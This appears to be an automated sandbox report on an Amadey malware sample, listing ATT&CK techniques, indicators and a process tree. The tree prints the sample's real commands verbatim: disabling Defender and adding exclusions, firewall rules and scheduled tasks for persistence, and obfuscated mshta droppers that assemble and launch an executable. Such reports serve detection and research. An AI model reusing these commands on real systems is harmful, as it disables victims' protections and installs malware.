amadey | edceb274c572ba560f1f27c5d97991b9b56a2bce8daf617f2b4c9bbbe5008db4

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5705.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5705.exe

Loads dropped DLL 9 IoCs

pid	Process
3200	setup_install.exe
3200	setup_install.exe
3200	setup_install.exe
3200	setup_install.exe
3200	setup_install.exe
1416	Sun0746b3c4631.tmp
1108	Sun07e840e6fb5.tmp
2004	Sun07e840e6fb5.tmp
2940	rundll32.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	5473224.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5705.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4699309.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 9 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
119	ip-api.com
322	ipinfo.io
2	ipinfo.io
83	ipinfo.io
94	ipinfo.io
119	ipinfo.io
234	ipinfo.io
258	ipinfo.io
2	ip-api.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
5308	5705.exe
5768	4699309.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3192 set thread context of 4512	3192	Sun07a9799f68e7.exe	111
PID 3500 set thread context of 3048	3500	Sun07610e6b216b74271.exe	294

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 21 IoCs

pid	pid_target	Process	procid_target
4044	4556	WerFault.exe	101
5732	852	WerFault.exe	112
5856	2940	WerFault.exe	163
2844	6132	WerFault.exe	157
4060	5984	WerFault.exe	153
5704	4820	WerFault.exe	162
3144	5280	WerFault.exe	160
5292	5304	WerFault.exe	180
5880	4024	WerFault.exe	214
4372	5680	WerFault.exe	253
2476	6068	WerFault.exe	256
2960	1108	WerFault.exe	255
2880	5252	WerFault.exe	261
3512	4228	WerFault.exe	252
5612	4736	WerFault.exe	265
2592	2464	WerFault.exe	266
5464	5584	WerFault.exe	248
1356	4508	WerFault.exe	247
1712	1604	WerFault.exe	254
5628	3340	WerFault.exe	389
3960	5776	WerFault.exe	408

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
3100	schtasks.exe
2132	schtasks.exe
5580	schtasks.exe
2868	schtasks.exe
5740	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
5408	taskkill.exe
6092	taskkill.exe
3856	taskkill.exe
2800	taskkill.exe
5196	taskkill.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
1932	powershell.exe
1932	powershell.exe
2192	powershell.exe
2192	powershell.exe
1932	powershell.exe
2192	powershell.exe
4044	WerFault.exe
4044	WerFault.exe
5308	5705.exe
5308	5705.exe
5732	WerFault.exe
5732	WerFault.exe
5768	4699309.exe
5768	4699309.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	852	Sun07d46efb4bd1.exe
Token: SeAssignPrimaryTokenPrivilege	852	Sun07d46efb4bd1.exe
Token: SeLockMemoryPrivilege	852	Sun07d46efb4bd1.exe
Token: SeIncreaseQuotaPrivilege	852	Sun07d46efb4bd1.exe
Token: SeMachineAccountPrivilege	852	Sun07d46efb4bd1.exe
Token: SeTcbPrivilege	852	Sun07d46efb4bd1.exe
Token: SeSecurityPrivilege	852	Sun07d46efb4bd1.exe
Token: SeTakeOwnershipPrivilege	852	Sun07d46efb4bd1.exe
Token: SeLoadDriverPrivilege	852	Sun07d46efb4bd1.exe
Token: SeSystemProfilePrivilege	852	Sun07d46efb4bd1.exe
Token: SeSystemtimePrivilege	852	Sun07d46efb4bd1.exe
Token: SeProfSingleProcessPrivilege	852	Sun07d46efb4bd1.exe
Token: SeIncBasePriorityPrivilege	852	Sun07d46efb4bd1.exe
Token: SeCreatePagefilePrivilege	852	Sun07d46efb4bd1.exe
Token: SeCreatePermanentPrivilege	852	Sun07d46efb4bd1.exe
Token: SeBackupPrivilege	852	Sun07d46efb4bd1.exe
Token: SeRestorePrivilege	852	Sun07d46efb4bd1.exe
Token: SeShutdownPrivilege	852	Sun07d46efb4bd1.exe
Token: SeDebugPrivilege	852	Sun07d46efb4bd1.exe
Token: SeAuditPrivilege	852	Sun07d46efb4bd1.exe
Token: SeSystemEnvironmentPrivilege	852	Sun07d46efb4bd1.exe
Token: SeChangeNotifyPrivilege	852	Sun07d46efb4bd1.exe
Token: SeRemoteShutdownPrivilege	852	Sun07d46efb4bd1.exe
Token: SeUndockPrivilege	852	Sun07d46efb4bd1.exe
Token: SeSyncAgentPrivilege	852	Sun07d46efb4bd1.exe
Token: SeEnableDelegationPrivilege	852	Sun07d46efb4bd1.exe
Token: SeManageVolumePrivilege	852	Sun07d46efb4bd1.exe
Token: SeImpersonatePrivilege	852	Sun07d46efb4bd1.exe
Token: SeCreateGlobalPrivilege	852	Sun07d46efb4bd1.exe
Token: 31	852	Sun07d46efb4bd1.exe
Token: 32	852	Sun07d46efb4bd1.exe
Token: 33	852	Sun07d46efb4bd1.exe
Token: 34	852	Sun07d46efb4bd1.exe
Token: 35	852	Sun07d46efb4bd1.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	3792	Sun078a90701e.exe
Token: SeDebugPrivilege	2284	Sun07923b89b57.exe
Token: SeRestorePrivilege	4044	WerFault.exe
Token: SeBackupPrivilege	4044	WerFault.exe
Token: SeDebugPrivilege	5408	taskkill.exe
Token: SeDebugPrivilege	6132	chrome.exe
Token: SeDebugPrivilege	5280	chrome update.exe
Token: SeDebugPrivilege	5872	SoftwareInstaller2191.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1108 wrote to memory of 2476	1108	setup_x86_x64_install.exe	81
PID 1108 wrote to memory of 2476	1108	setup_x86_x64_install.exe	81
PID 1108 wrote to memory of 2476	1108	setup_x86_x64_install.exe	81
PID 2476 wrote to memory of 3200	2476	setup_installer.exe	82
PID 2476 wrote to memory of 3200	2476	setup_installer.exe	82
PID 2476 wrote to memory of 3200	2476	setup_installer.exe	82
PID 3200 wrote to memory of 2584	3200	setup_install.exe	86
PID 3200 wrote to memory of 2584	3200	setup_install.exe	86
PID 3200 wrote to memory of 2584	3200	setup_install.exe	86
PID 3200 wrote to memory of 2976	3200	setup_install.exe	87
PID 3200 wrote to memory of 2976	3200	setup_install.exe	87
PID 3200 wrote to memory of 2976	3200	setup_install.exe	87
PID 2584 wrote to memory of 1932	2584	cmd.exe	88
PID 2584 wrote to memory of 1932	2584	cmd.exe	88
PID 2584 wrote to memory of 1932	2584	cmd.exe	88
PID 2976 wrote to memory of 2192	2976	cmd.exe	89
PID 2976 wrote to memory of 2192	2976	cmd.exe	89
PID 2976 wrote to memory of 2192	2976	cmd.exe	89
PID 3200 wrote to memory of 1788	3200	setup_install.exe	90
PID 3200 wrote to memory of 1788	3200	setup_install.exe	90
PID 3200 wrote to memory of 1788	3200	setup_install.exe	90
PID 3200 wrote to memory of 2208	3200	setup_install.exe	119
PID 3200 wrote to memory of 2208	3200	setup_install.exe	119
PID 3200 wrote to memory of 2208	3200	setup_install.exe	119
PID 3200 wrote to memory of 2156	3200	setup_install.exe	91
PID 3200 wrote to memory of 2156	3200	setup_install.exe	91
PID 3200 wrote to memory of 2156	3200	setup_install.exe	91
PID 3200 wrote to memory of 4280	3200	setup_install.exe	118
PID 3200 wrote to memory of 4280	3200	setup_install.exe	118
PID 3200 wrote to memory of 4280	3200	setup_install.exe	118
PID 3200 wrote to memory of 3168	3200	setup_install.exe	92
PID 3200 wrote to memory of 3168	3200	setup_install.exe	92
PID 3200 wrote to memory of 3168	3200	setup_install.exe	92
PID 3200 wrote to memory of 4796	3200	setup_install.exe	117
PID 3200 wrote to memory of 4796	3200	setup_install.exe	117
PID 3200 wrote to memory of 4796	3200	setup_install.exe	117
PID 3200 wrote to memory of 2808	3200	setup_install.exe	93
PID 3200 wrote to memory of 2808	3200	setup_install.exe	93
PID 3200 wrote to memory of 2808	3200	setup_install.exe	93
PID 3200 wrote to memory of 2824	3200	setup_install.exe	94
PID 3200 wrote to memory of 2824	3200	setup_install.exe	94
PID 3200 wrote to memory of 2824	3200	setup_install.exe	94
PID 3168 wrote to memory of 1340	3168	cmd.exe	116
PID 3168 wrote to memory of 1340	3168	cmd.exe	116
PID 3168 wrote to memory of 1340	3168	cmd.exe	116
PID 1788 wrote to memory of 3512	1788	cmd.exe	115
PID 1788 wrote to memory of 3512	1788	cmd.exe	115
PID 1788 wrote to memory of 3512	1788	cmd.exe	115
PID 3200 wrote to memory of 3420	3200	setup_install.exe	95
PID 3200 wrote to memory of 3420	3200	setup_install.exe	95
PID 3200 wrote to memory of 3420	3200	setup_install.exe	95
PID 3200 wrote to memory of 3980	3200	setup_install.exe	96
PID 3200 wrote to memory of 3980	3200	setup_install.exe	96
PID 3200 wrote to memory of 3980	3200	setup_install.exe	96
PID 2824 wrote to memory of 4352	2824	cmd.exe	114
PID 2824 wrote to memory of 4352	2824	cmd.exe	114
PID 3200 wrote to memory of 1068	3200	setup_install.exe	113
PID 3200 wrote to memory of 1068	3200	setup_install.exe	113
PID 3200 wrote to memory of 1068	3200	setup_install.exe	113
PID 3200 wrote to memory of 3764	3200	setup_install.exe	97
PID 3200 wrote to memory of 3764	3200	setup_install.exe	97
PID 3200 wrote to memory of 3764	3200	setup_install.exe	97
PID 3200 wrote to memory of 2852	3200	setup_install.exe	109
PID 3200 wrote to memory of 2852	3200	setup_install.exe	109

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1108
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2476
- - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3200
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2584
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1932
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2976
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2192
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07f05cf99e017109.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1788
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07f05cf99e017109.exe
        
        Sun07f05cf99e017109.exe
        5⤵
        Executes dropped EXE
        
        PID:3512
      - C:\Users\Admin\Pictures\Adobe Films\JY8sbKmrkn0UQsS35Nbc8DtJ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\JY8sbKmrkn0UQsS35Nbc8DtJ.exe"
        6⤵
        
        PID:5076
      - C:\Users\Admin\Pictures\Adobe Films\osLbX8ysn3HuqnL6Xr4Zssfk.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\osLbX8ysn3HuqnL6Xr4Zssfk.exe"
        6⤵
        
        PID:4508
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 292
        7⤵
        Program crash
        
        PID:1356
      - C:\Users\Admin\Pictures\Adobe Films\9hj9Ir3xHdjAPQKVlbdPXTT1.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\9hj9Ir3xHdjAPQKVlbdPXTT1.exe"
        6⤵
        
        PID:5584
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 276
        7⤵
        Program crash
        
        PID:5464
      - C:\Users\Admin\Pictures\Adobe Films\3fADJaWYEbUJhXYclYnPj4mM.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\3fADJaWYEbUJhXYclYnPj4mM.exe"
        6⤵
        
        PID:5696
        
        C:\Users\Admin\AppData\Roaming\4977687.exe
        
        "C:\Users\Admin\AppData\Roaming\4977687.exe"
        7⤵
        
        PID:1884
        
        C:\Users\Admin\AppData\Roaming\8899672.exe
        
        "C:\Users\Admin\AppData\Roaming\8899672.exe"
        7⤵
        Executes dropped EXE
        
        PID:3048
        
        C:\Users\Admin\AppData\Roaming\7370764.exe
        
        "C:\Users\Admin\AppData\Roaming\7370764.exe"
        7⤵
        
        PID:5800
        
        C:\Users\Admin\AppData\Roaming\1174937.exe
        
        "C:\Users\Admin\AppData\Roaming\1174937.exe"
        7⤵
        
        PID:3960
        
        C:\Users\Admin\AppData\Roaming\4812454.exe
        
        "C:\Users\Admin\AppData\Roaming\4812454.exe"
        7⤵
        
        PID:5940
        
        C:\Users\Admin\AppData\Roaming\3940129.exe
        
        "C:\Users\Admin\AppData\Roaming\3940129.exe"
        7⤵
        
        PID:5308
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Roaming\3940129.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if """"== """" for %v In (""C:\Users\Admin\AppData\Roaming\3940129.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )
        8⤵
        
        PID:3920
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Roaming\3940129.exe" > Qw5u.exe &&stARt Qw5U.Exe -PmowtdFUhhnCoUk &if ""== "" for %v In ("C:\Users\Admin\AppData\Roaming\3940129.exe" ) do taskkill -F -IM "%~Nxv"
        9⤵
        
        PID:848
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F -IM "3940129.exe"
        10⤵
        Kills process with taskkill
        
        PID:5196
        
        C:\Users\Admin\AppData\Local\Temp\Qw5u.exe
        
        Qw5U.Exe -PmowtdFUhhnCoUk
        10⤵
        
        PID:5792
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if ""-PmowtdFUhhnCoUk ""== """" for %v In (""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )
        11⤵
        
        PID:3952
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Local\Temp\Qw5u.exe" > Qw5u.exe &&stARt Qw5U.Exe -PmowtdFUhhnCoUk &if "-PmowtdFUhhnCoUk "== "" for %v In ("C:\Users\Admin\AppData\Local\Temp\Qw5u.exe" ) do taskkill -F -IM "%~Nxv"
        12⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIPt:CloSE( cREateOBJecT ( "WscRipt.SHeLl").Run("CMD /Q /C ECHO | sEt /P = ""MZ"" > IEEeXE.7YX & CoPY /b /Y IEEeXE.7YX + WWgJAR1.EZ +zYEV.3Cu+ NUvL.Bf2 B0M3yFV5.lRJ &del wWgJAR1.EZ zYEv.3cU NUVL.Bf2 IEEEXE.7yX& START control.exe .\B0M3YFV5.lRJ ",0,tRUE) )
        11⤵
        
        PID:5196
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C ECHO | sEt /P = "MZ" > IEEeXE.7YX&CoPY /b /Y IEEeXE.7YX+WWgJAR1.EZ +zYEV.3Cu+ NUvL.Bf2 B0M3yFV5.lRJ &del wWgJAR1.EZ zYEv.3cU NUVL.Bf2 IEEEXE.7yX& START control.exe .\B0M3YFV5.lRJ
        12⤵
        
        PID:6784
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO "
        13⤵
        
        PID:6644
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>IEEeXE.7YX"
        13⤵
        
        PID:6984
        
        C:\Windows\SysWOW64\control.exe
        
        control.exe .\B0M3YFV5.lRJ
        13⤵
        
        PID:1788
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\B0M3YFV5.lRJ
        14⤵
        
        PID:6040
        
        C:\Users\Admin\AppData\Roaming\8764124.exe
        
        "C:\Users\Admin\AppData\Roaming\8764124.exe"
        7⤵
        
        PID:2760
      - C:\Users\Admin\Pictures\Adobe Films\eyHaWTkg87FCx1zh9UGQaWFt.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\eyHaWTkg87FCx1zh9UGQaWFt.exe"
        6⤵
        
        PID:1544
        
        C:\Program Files (x86)\Company\NewProduct\cm3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
        7⤵
        
        PID:3940
        
        C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
        
        "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
        7⤵
        
        PID:3804
        
        C:\Program Files (x86)\Company\NewProduct\inst2.exe
        
        "C:\Program Files (x86)\Company\NewProduct\inst2.exe"
        7⤵
        
        PID:5772
      - C:\Users\Admin\Pictures\Adobe Films\DqRhIiPwEqochUYv_5ISY4Zp.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\DqRhIiPwEqochUYv_5ISY4Zp.exe"
        6⤵
        
        PID:6060
        
        C:\Users\Admin\Documents\i8WBiL8z7jI_urefxCBPVbM5.exe
        
        "C:\Users\Admin\Documents\i8WBiL8z7jI_urefxCBPVbM5.exe"
        7⤵
        
        PID:6844
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:3100
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:2132
      - C:\Users\Admin\Pictures\Adobe Films\5U4q0MWFWfPGXF7QVaR6grOt.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\5U4q0MWFWfPGXF7QVaR6grOt.exe"
        6⤵
        
        PID:4228
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 276
        7⤵
        Program crash
        
        PID:3512
      - C:\Users\Admin\Pictures\Adobe Films\tthZl90LGkJrqQQcNbE_RIIw.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\tthZl90LGkJrqQQcNbE_RIIw.exe"
        6⤵
        
        PID:5680
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 300
        7⤵
        Program crash
        
        PID:4372
      - C:\Users\Admin\Pictures\Adobe Films\bR2twElFJGIuu6TQPA9wniDV.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\bR2twElFJGIuu6TQPA9wniDV.exe"
        6⤵
        
        PID:1604
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 280
        7⤵
        Program crash
        
        PID:1712
      - C:\Users\Admin\Pictures\Adobe Films\oMPvqs9BYxwt4QZsNYP_OzOQ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\oMPvqs9BYxwt4QZsNYP_OzOQ.exe"
        6⤵
        
        PID:1108
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 1768
        7⤵
        Program crash
        
        PID:2960
      - C:\Users\Admin\Pictures\Adobe Films\q36rvWSsQ35eoIM91iuUhdYO.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\q36rvWSsQ35eoIM91iuUhdYO.exe"
        6⤵
        
        PID:6068
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6068 -s 292
        7⤵
        Program crash
        
        PID:2476
      - C:\Users\Admin\Pictures\Adobe Films\RdVV5avJHPkdah3EsmC6ubsS.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\RdVV5avJHPkdah3EsmC6ubsS.exe"
        6⤵
        
        PID:5228
        
        C:\Users\Admin\Pictures\Adobe Films\RdVV5avJHPkdah3EsmC6ubsS.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\RdVV5avJHPkdah3EsmC6ubsS.exe"
        7⤵
        
        PID:2564
      - C:\Users\Admin\Pictures\Adobe Films\3vs16KMQLeisok2uunDFrpX5.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\3vs16KMQLeisok2uunDFrpX5.exe"
        6⤵
        
        PID:6140
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:4788
      - C:\Users\Admin\Pictures\Adobe Films\Uhb5cklb9zsX6ICH8U1K6A8H.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Uhb5cklb9zsX6ICH8U1K6A8H.exe"
        6⤵
        
        PID:4040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
        7⤵
        
        PID:5712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
        7⤵
        
        PID:1196
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
        7⤵
        
        PID:6136
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5580
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
        7⤵
        
        PID:2860
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
        7⤵
        Creates scheduled task(s)
        
        PID:5740
        
        C:\Windows\System\svchost.exe
        
        "C:\Windows\System\svchost.exe" formal
        7⤵
        
        PID:4640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
        8⤵
        
        PID:3216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
        8⤵
        
        PID:5228
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
        8⤵
        
        PID:5272
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
        8⤵
        
        PID:4496
      - C:\Users\Admin\Pictures\Adobe Films\Bj6d79cfOfT2JK4QNWwZdBfc.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Bj6d79cfOfT2JK4QNWwZdBfc.exe"
        6⤵
        
        PID:5252
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 300
        7⤵
        Program crash
        
        PID:2880
      - C:\Users\Admin\Pictures\Adobe Films\MLyljXFPLxNhJlWAS3KpgBMU.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\MLyljXFPLxNhJlWAS3KpgBMU.exe"
        6⤵
        
        PID:3764
        
        C:\Users\Admin\Pictures\Adobe Films\MLyljXFPLxNhJlWAS3KpgBMU.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\MLyljXFPLxNhJlWAS3KpgBMU.exe"
        7⤵
        
        PID:344
      - C:\Users\Admin\Pictures\Adobe Films\lF3l8dayrMRbKxaOUKUQ34vB.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\lF3l8dayrMRbKxaOUKUQ34vB.exe"
        6⤵
        Executes dropped EXE
        
        PID:5240
      - C:\Users\Admin\Pictures\Adobe Films\IEuT39nblOzddDDDGpZLu3mW.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\IEuT39nblOzddDDDGpZLu3mW.exe"
        6⤵
        
        PID:5520
      - C:\Users\Admin\Pictures\Adobe Films\8B9LzrqGUoHgHm39uvZEwLJx.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\8B9LzrqGUoHgHm39uvZEwLJx.exe"
        6⤵
        
        PID:4736
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 272
        7⤵
        Program crash
        
        PID:5612
      - C:\Users\Admin\Pictures\Adobe Films\caKVARifz253bzwR35VKTIK0.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\caKVARifz253bzwR35VKTIK0.exe"
        6⤵
        
        PID:2464
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2464 -s 280
        7⤵
        Program crash
        
        PID:2592
      - C:\Users\Admin\Pictures\Adobe Films\Vw2nv7Z1PkJS2CxGERjVqIZH.exe
        
